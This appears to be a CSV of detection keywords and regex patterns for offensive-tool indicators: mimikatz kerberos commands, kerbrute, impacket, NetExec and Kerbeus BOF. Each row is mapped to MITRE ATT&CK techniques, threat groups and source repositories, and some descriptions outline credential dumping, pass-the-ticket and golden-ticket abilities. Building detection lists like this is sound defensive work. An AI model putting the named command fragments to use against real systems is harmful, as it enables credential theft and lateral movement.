"*kerberos::golden*",".{0,1000}kerberos\:\:golden.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50329"
"*kerberos::hash*",".{0,1000}kerberos\:\:hash.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50330"
"*kerberos::list*",".{0,1000}kerberos\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50331"
"*kerberos::list*",".{0,1000}kerberos\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50332"
"*kerberos::ptc*",".{0,1000}kerberos\:\:ptc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50333"
"*kerberos::ptt *.kirbi*",".{0,1000}kerberos\:\:ptt\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","50334"
"*kerberos::ptt*",".{0,1000}kerberos\:\:ptt.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50335"
"*kerberos::ptt*",".{0,1000}kerberos\:\:ptt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50336"
"*kerberos::ptt*.kirbi*",".{0,1000}kerberos\:\:ptt.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50337"
"*kerberos::purge*",".{0,1000}kerberos\:\:purge.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50338"
"*kerberos::tgt*",".{0,1000}kerberos\:\:tgt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50339"
"*kerberos_enumusers.*",".{0,1000}kerberos_enumusers\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50340"
"*kerberos_login_with_S4U(*",".{0,1000}kerberos_login_with_S4U\(.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","50341"
"*kerberos_steal*",".{0,1000}kerberos_steal.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","50342"
"*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50343"
"*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50344"
"*kerberos-ldap-password-hunter.sh*",".{0,1000}kerberos\-ldap\-password\-hunter\.sh.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50345"
"*kerberosv5.py*",".{0,1000}kerberosv5\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50346"
"*Kerbeus * by RalfHacker*",".{0,1000}Kerbeus\s.{0,1000}\sby\sRalfHacker.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50347"
"*kerbeus_cs.cna*",".{0,1000}kerbeus_cs\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50348"
"*kerbeus_havoc.py*",".{0,1000}kerbeus_havoc\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50349"
"*Kerbeus-BOF-main*",".{0,1000}Kerbeus\-BOF\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50350"
"*kerbrute -*",".{0,1000}kerbrute\s\-.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","50351"
"*kerbrute bruteuser *",".{0,1000}kerbrute\sbruteuser\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50352"
